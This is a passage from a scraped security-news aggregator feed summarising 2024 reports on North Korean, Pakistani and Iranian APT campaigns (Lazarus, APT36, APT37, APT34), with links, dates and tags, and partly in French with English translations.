(DPRK), has been observed leveraging a "complex infection chain" targeting at least two employees belonging to an unnamed nuclear-related organization within the span of one month in January 2024. The attacks, which culminated in the deployment of a new modular backdoor referred to as CookiePlus, are]]> 2024-12-20T16:14:00+00:00 https://thehackernews.com/2024/12/lazarus-group-spotted-targeting-nuclear.html www.secnews.physaphae.fr/article.php?IdArticle=8627927 False Malware,Threat APT 38 4.0000000000000000 Kaspersky - Kaspersky Research blog Lazarus targets employees of a nuclear-related organization with a bunch of malware, such as MISTPEN, LPEClient, RollMid, CookieTime and a new modular backdoor CookiePlus.]]> 2024-12-19T10:00:55+00:00 https://securelist.com/lazarus-new-malware/115059/ www.secnews.physaphae.fr/article.php?IdArticle=8627438 False Malware APT 38 3.0000000000000000 RedTeam PL - DarkTrace: AI bases detection https://blog.redteam.pl/2019/05/badwpad-dns-suffix-wpad-wpadblocking-com.html]. WPAD TLDs First of all we checked TLD list from IANA [https://data.iana.org/TLD/tlds-alpha-by-domain.txt] for first level of wpad domains: 101.37.23.113 wpad.bike 104.18.54.241 wpad.mobi 104.18.55.241 wpad.mobi 104.199.123.6 wpad.ac 104.24.104.177 wpad.online 104.24.104.228 wpad.army 104.24.105.177 wpad.online 104.24.105.228 wpad.army 104.24.120.45 wpad.space 104.24.121.45 wpad.space 104.25.51.128 wpad.world 104.27.176.234 wpad.site 104.27.177.234 wpad.site 104.27.188.57 wpad.co 104.27.189.57 wpad.co 104.28.10.19 wpad.kz 104.28.11.19 wpad.kz 104.31.74.75 wpad.exchange ]]> 2024-12-01T15:56:58+00:00 https://blog.redteam.pl/2019/05/wpad-software-case-dns-threat-hunting.html www.secnews.physaphae.fr/article.php?IdArticle=8618460 False Malware,Threat APT 32 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-18T12:22:31+00:00 https://community.riskiq.com/article/2560112c www.secnews.physaphae.fr/article.php?IdArticle=8613484 False Ransomware,Malware,Tool,Vulnerability,Threat,Prediction,Medical,Cloud,Technical APT 41,APT 38 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot Researchers at Group-IB have ide]]> 2024-11-15T15:40:32+00:00 https://community.riskiq.com/article/7c6b391d www.secnews.physaphae.fr/article.php?IdArticle=8611812 False Malware,Threat,Prediction APT 38 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Threat actors have been found leveraging a new technique that abuses extended attributes for macOS files to smuggle a new malware called RustyAttr. The Singaporean cybersecurity company has attributed the novel activity with moderate confidence to the infamous North Korea-linked Lazarus Group, citing infrastructure and tactical overlaps observed in connection with prior campaigns, including]]> 2024-11-14T15:21:00+00:00 https://thehackernews.com/2024/11/new-rustyattr-malware-targets-macos.html www.secnews.physaphae.fr/article.php?IdArticle=8610957 False Malware,Threat APT 38 3.0000000000000000 HackRead - Chercher Cyber Group-IB has uncovered Lazarus group\'s stealthy new trojan and technique of hiding malicious code in extended attributes on…]]> 2024-11-14T13:13:41+00:00 https://hackread.com/lazarus-group-macos-rustyattr-trojan-fake-job-pdfs/ www.secnews.physaphae.fr/article.php?IdArticle=8611075 False None APT 38 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Lazarus APT has been found smuggling malware onto macOS devices using custom extended attributes, evading detection]]> 2024-11-13T16:00:00+00:00 https://www.infosecurity-magazine.com/news/lazarus-extended-attributes-macos/ www.secnews.physaphae.fr/article.php?IdArticle=8610465 False Malware APT 38 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-11T12:45:44+00:00 https://community.riskiq.com/article/3b100c61 www.secnews.physaphae.fr/article.php?IdArticle=8609345 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Cloud APT 37 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) High-profile entities in India have become the target of malicious campaigns orchestrated by the Pakistan-based Transparent Tribe threat actor and a previously unknown China-nexus cyber espionage group dubbed IcePeony. The intrusions linked to Transparent Tribe involve the use of a malware called ElizaRAT and a new stealer payload dubbed ApoloStealer on specific victims of interest, Check Point]]> 2024-11-08T17:53:00+00:00 https://thehackernews.com/2024/11/icepeony-and-transparent-tribe-target.html www.secnews.physaphae.fr/article.php?IdArticle=8608093 False Malware,Tool,Threat APT 36 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-07T21:47:54+00:00 https://community.riskiq.com/article/fd1c0c96 www.secnews.physaphae.fr/article.php?IdArticle=8607767 False Malware,Threat,Cloud APT 37 2.0000000000000000 Global Security Mag - Site de news francais Malwares]]> 2024-11-05T13:08:28+00:00 https://www.globalsecuritymag.fr/transparent-tribe-apt36-son-nouveau-malware-elizarat-evolue-encore.html www.secnews.physaphae.fr/article.php?IdArticle=8606418 False Malware APT 36 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine APT36 evolved its remote access trojan, ElizaRAT, along with introducing a new stealer payload called ApoloStealer]]> 2024-11-05T11:30:00+00:00 https://www.infosecurity-magazine.com/news/pakistan-hackers-high-profile/ www.secnews.physaphae.fr/article.php?IdArticle=8606395 False None APT 36 2.0000000000000000 Dark Reading - Informationweek Branch The Pakistan-based advanced persistent threat actor has been carrying on a cyber-espionage campaign targeting organizations on the subcontinent for more than a decade, and it\'s now using a new and improved "ElizaRAT" malware.]]> 2024-11-04T22:39:41+00:00 https://www.darkreading.com/cyberattacks-data-breaches/apt36-refines-tools-attacks-indian-targets www.secnews.physaphae.fr/article.php?IdArticle=8606147 False Malware,Tool,Threat APT 36 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-04T19:39:03+00:00 https://community.riskiq.com/article/f01e1d00 www.secnews.physaphae.fr/article.php?IdArticle=8606105 False Ransomware,Malware,Tool,Threat,Mobile,Cloud,Technical APT 36 2.0000000000000000 Checkpoint Research - Fabricant Materiel Securite Introduction APT36, également connue sous le nom de Tribe Transparent, est un acteur de menace basé au Pakistan notoire pour cibler constamment les organisations gouvernementales indiennes, le personnel diplomatique et les installations militaires.APT36 a mené de nombreuses campagnes de cyber-espionnage contre Windows, Linux et Android Systems.Dans les campagnes récentes, l'APT36 a utilisé un rat Windows particulièrement insidieux connu sous le nom d'Elizarat.Découvert pour la première fois en 2023, Elizarat a significativement [& # 8230;]

---

>Introduction APT36, also known as Transparent Tribe, is a Pakistan-based threat actor notorious for persistently targeting Indian government organizations, diplomatic personnel, and military facilities. APT36 has conducted numerous cyber-espionage campaigns against Windows, Linux, and Android systems. In recent campaigns, APT36 utilized a particularly insidious Windows RAT known as ElizaRAT. First discovered in 2023, ElizaRAT has significantly […] ]]> 2024-11-04T13:33:15+00:00 https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8605953 False Threat,Mobile APT 36 2.0000000000000000 Checkpoint - Fabricant Materiel Securite Résumé exécutif: Dans les cyberattaques récentes, la tribu transparente ou l'APT36, a utilisé un malware de plus en plus sophistiqué appelé Elizarat.Vérifier les recherches sur le point de contrôle a suivi l'évolution d'Elizarat \\, en découvrant ses méthodes d'exécution améliorées, son évasion de détection et sa communication de commandement et de contrôle depuis sa divulgation publique en septembre 2023. Les campagnes Elizarat ont d'abord exécuté la même fonction pour vérifier que le système a été mis en IndeTemps standard, indiquant que les campagnes ont ciblé les systèmes indiens.La tribu transparente, autrement connue sous le nom d'APT36, est un acteur de menace affilié au Pakistan qui cible notoirement les entités associées aux Indiens.Le principal objectif du groupe de menaces est le cyber-espionnage, qui a auparavant ciblé les organisations gouvernementales, diplomatique [& # 8230;]

---

>Executive Summary: In recent cyber attacks, Transparent Tribe, or APT36, has utilized an increasingly sophisticated malware called ElizaRAT. Check Point Research tracked ElizaRAT\'s evolution, uncovering its improved execution methods, detection evasion, and Command and Control communication since its public disclosure in September 2023. The ElizaRAT campaigns first executed the same function to verify that the system was set to India Standard Time, indicating that the campaigns targeted Indian systems. Transparent Tribe, otherwise known as APT36, is a Pakistan-affiliated threat actor that notoriously targets Indian-associated entities. The threat group\'s main objective is cyber espionage, which has previously targeted governmental organizations, diplomatic […] ]]> 2024-11-04T13:00:51+00:00 https://blog.checkpoint.com/research/the-evolution-of-transparent-tribes-new-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8605928 False Malware,Threat APT 36 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-04T12:25:16+00:00 https://community.riskiq.com/article/d6da7f0d www.secnews.physaphae.fr/article.php?IdArticle=8605948 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Prediction,Medical,Cloud,Technical APT 41,APT 28,APT 31,Guam 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-31T20:29:50+00:00 https://community.riskiq.com/article/798c0fdb www.secnews.physaphae.fr/article.php?IdArticle=8604363 False Malware,Tool,Vulnerability,Threat,Legislation,Cloud APT 41,APT 31 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-30T18:25:16+00:00 https://community.riskiq.com/article/3c757860 www.secnews.physaphae.fr/article.php?IdArticle=8603864 True Ransomware,Malware,Tool,Vulnerability,Threat APT 31 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-28T11:27:40+00:00 https://community.riskiq.com/article/fa5a55d5 www.secnews.physaphae.fr/article.php?IdArticle=8602805 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat,Prediction,Medical,Cloud,Technical APT 38,Guam 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-25T16:11:10+00:00 https://community.riskiq.com/article/e831e4ae www.secnews.physaphae.fr/article.php?IdArticle=8601740 False Ransomware,Malware,Tool,Vulnerability,Threat APT 38 2.0000000000000000 Global Security Mag - Site de news francais Investigations]]> 2024-10-24T23:33:00+00:00 https://www.globalsecuritymag.fr/le-groupe-apt-lazarus-a-exploite-une-vulnerabilite-zero-day-dans-chrome-pour.html www.secnews.physaphae.fr/article.php?IdArticle=8602217 False Vulnerability,Threat APT 38 2.0000000000000000 HackRead - Chercher Cyber North Korean hackers from Lazarus Group exploited a zero-day vulnerability in Google Chrome to target cryptocurrency investors with…]]> 2024-10-24T17:38:25+00:00 https://hackread.com/north-korean-hackers-crypto-deceptive-game-zero-day-exploit/ www.secnews.physaphae.fr/article.php?IdArticle=8601586 False Vulnerability,Threat APT 38 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Lazarus Group exploited Google Chrome zero-day, infecting systems with Manuscrypt malware]]> 2024-10-24T16:00:00+00:00 https://www.infosecurity-magazine.com/news/lazarus-group-exploits-google/ www.secnews.physaphae.fr/article.php?IdArticle=8601571 False Malware,Vulnerability,Threat APT 38 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korean threat actor known as Lazarus Group has been attributed to the zero-day exploitation of a now-patched security flaw in Google Chrome to seize control of infected devices. Cybersecurity vendor Kaspersky said it discovered a novel attack chain in May 2024 that targeted the personal computer of an unnamed Russian national with the Manuscrypt backdoor. This entails triggering the]]> 2024-10-24T15:23:00+00:00 https://thehackernews.com/2024/10/lazarus-group-exploits-google-chrome.html www.secnews.physaphae.fr/article.php?IdArticle=8601531 False Vulnerability,Threat APT 38 2.0000000000000000 SecurityWeek - Security News Le Lazarus APT a créé un site Web trompeur qui a exploité un chrome zéro-jour pour installer des logiciels malveillants et voler la crypto-monnaie.

---

>The Lazarus APT created a deceptive website that exploited a Chrome zero-day to install malware and steal cryptocurrency. ]]> 2024-10-24T13:02:10+00:00 https://www.securityweek.com/north-korean-hackers-exploited-chrome-zero-day-for-cryptocurrency-theft/ www.secnews.physaphae.fr/article.php?IdArticle=8601542 False Malware,Vulnerability,Threat APT 38 2.0000000000000000 Dark Reading - Informationweek Branch The North Korean actor is going after cryptocurrency investors worldwide leveraging a genuine-looking game site and AI-generated content and images.]]> 2024-10-23T20:55:13+00:00 https://www.darkreading.com/cyberattacks-data-breaches/lazarus-group-exploits-chrome-zero-day-campaign www.secnews.physaphae.fr/article.php?IdArticle=8601480 False Vulnerability,Threat APT 38 2.0000000000000000 Kaspersky - Kaspersky Research blog Kaspersky GReAT experts break down the new campaign of Lazarus APT which uses social engineering and exploits a zero-day vulnerability in Google Chrome for financial gain.]]> 2024-10-23T11:00:48+00:00 https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/ www.secnews.physaphae.fr/article.php?IdArticle=8601458 False Vulnerability,Threat APT 38 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-21T11:41:26+00:00 https://community.riskiq.com/article/02320e34 www.secnews.physaphae.fr/article.php?IdArticle=8600983 False Ransomware,Malware,Tool,Vulnerability,Threat,Cloud APT 38,APT 37,APT-C-17 2.0000000000000000 Dark Reading - Informationweek Branch The "Code-on-Toast" supply chain cyberattacks by APT37 delivered data-stealing malware to users in South Korea who had enabled Toast pop-up ads.]]> 2024-10-21T01:00:00+00:00 https://www.darkreading.com/vulnerabilities-threats/dprk-microsoft-zero-day-no-click-toast-attacks www.secnews.physaphae.fr/article.php?IdArticle=8600761 False Malware,Vulnerability,Threat APT 37 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-18T20:59:53+00:00 https://community.riskiq.com/article/b0437795 www.secnews.physaphae.fr/article.php?IdArticle=8599903 False Malware,Tool APT 38 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-18T20:53:46+00:00 https://community.riskiq.com/article/d11b6766 www.secnews.physaphae.fr/article.php?IdArticle=8599904 False Malware,Vulnerability,Threat APT 37 3.0000000000000000 Dark Reading - Informationweek Branch A MOIS-aligned threat group has been using Microsoft Exchange servers to exfiltrate sensitive data from Gulf-state government agencies.]]> 2024-10-17T06:00:00+00:00 https://www.darkreading.com/cyberattacks-data-breaches/iran-apt34-ms-exchange-spy-gulf-govts www.secnews.physaphae.fr/article.php?IdArticle=8599077 False Threat APT 34 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korean threat actor known as ScarCruft has been linked to the zero-day exploitation of a now-patched security flaw in Windows to infect devices with malware known as RokRAT. The vulnerability in question is CVE-2024-38178 (CVSS score: 7.5), a memory corruption bug in the Scripting Engine that could result in remote code execution when using the Edge browser in Internet Explorer Mode.]]> 2024-10-16T16:20:00+00:00 https://thehackernews.com/2024/10/north-korean-scarcruft-exploits-windows.html www.secnews.physaphae.fr/article.php?IdArticle=8598696 False Malware,Vulnerability,Threat APT 37 2.0000000000000000 Bleeping Computer - Magazine Américain The North Korean hacking group ScarCruft launched a large-scale attack in May that leveraged an Internet Explorer zero-day flaw to infect targets with the RokRAT malware and exfiltrate data. [...]]]> 2024-10-16T09:59:12+00:00 https://www.bleepingcomputer.com/news/security/malicious-ads-exploited-internet-explorer-zero-day-to-drop-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8598745 False Malware,Vulnerability,Threat APT 37 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-15T21:16:48+00:00 https://community.riskiq.com/article/9ce29d67 www.secnews.physaphae.fr/article.php?IdArticle=8598422 False Malware,Tool,Threat APT 38 3.0000000000000000 IndustrialCyber - cyber risk firms for industrial New research by Trend Micro disclosed that the Iranian cyber espionage group Earth Simnavaz, also known as APT34... ]]> 2024-10-15T15:49:31+00:00 https://industrialcyber.co/ransomware/trend-micro-reveals-earth-simnavaz-apt-targets-gulf-organizations-using-microsoft-exchange-server-backdoor/ www.secnews.physaphae.fr/article.php?IdArticle=8598242 False Prediction APT 34 2.0000000000000000 SecurityWeek - Security News Le pétrole APT lié à l'Iran a intensifié les cyber-opérations contre les Émirats arabes unis et la région du Golfe plus large.

---

>The Iran-linked APT OilRig has intensified cyber operations against the United Arab Emirates and the broader Gulf region. ]]> 2024-10-14T11:20:49+00:00 https://www.securityweek.com/iranian-cyberspies-exploiting-recent-windows-kernel-vulnerability/ www.secnews.physaphae.fr/article.php?IdArticle=8597613 False Vulnerability APT 34 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The Iranian threat actor known as OilRig has been observed exploiting a now-patched privilege escalation flaw impacting the Windows Kernel as part of a cyber espionage campaign targeting the U.A.E. and the broader Gulf region. "The group utilizes sophisticated tactics that include deploying a backdoor that leverages Microsoft Exchange servers for credentials theft, and exploiting vulnerabilities]]> 2024-10-13T15:10:00+00:00 https://thehackernews.com/2024/10/oilrig-exploits-windows-kernel-flaw-in.html www.secnews.physaphae.fr/article.php?IdArticle=8597073 False Vulnerability,Threat APT 34 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - United Arab Emirates ## Snapshot Researchers at Trend Micro have identif]]> 2024-10-11T21:41:42+00:00 https://community.riskiq.com/article/bc0f3dd1 www.secnews.physaphae.fr/article.php?IdArticle=8596273 False Malware,Tool,Vulnerability,Threat,Prediction APT 34 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-07T16:54:11+00:00 https://community.riskiq.com/article/33015049 www.secnews.physaphae.fr/article.php?IdArticle=8593765 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Prediction,Cloud APT 37,APT 45 2.0000000000000000 Dark Reading - Informationweek Branch It\'s North Korea versus Cambodia, with Windows default settings and sheer patience allowing the bad guys to avoid easy detection.]]> 2024-10-04T01:00:00+00:00 https://www.darkreading.com/cyberattacks-data-breaches/dprk-apt37-cambodia-khmer-veilshell-backdoor www.secnews.physaphae.fr/article.php?IdArticle=8591649 False None APT 37 2.0000000000000000 Recorded Future - FLux Recorded Future Researchers linked the campaign to APT37, a hacking group allegedly housed within North Korea\'s Ministry of State Security.]]> 2024-10-03T20:53:04+00:00 https://therecord.media/north-korea-malware-espionage-cambodia www.secnews.physaphae.fr/article.php?IdArticle=8591527 False Malware APT 37 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-03T20:13:46+00:00 https://community.riskiq.com/article/2e62a43c www.secnews.physaphae.fr/article.php?IdArticle=8591525 False Malware,Tool,Vulnerability,Threat,Cloud APT 37 3.0000000000000000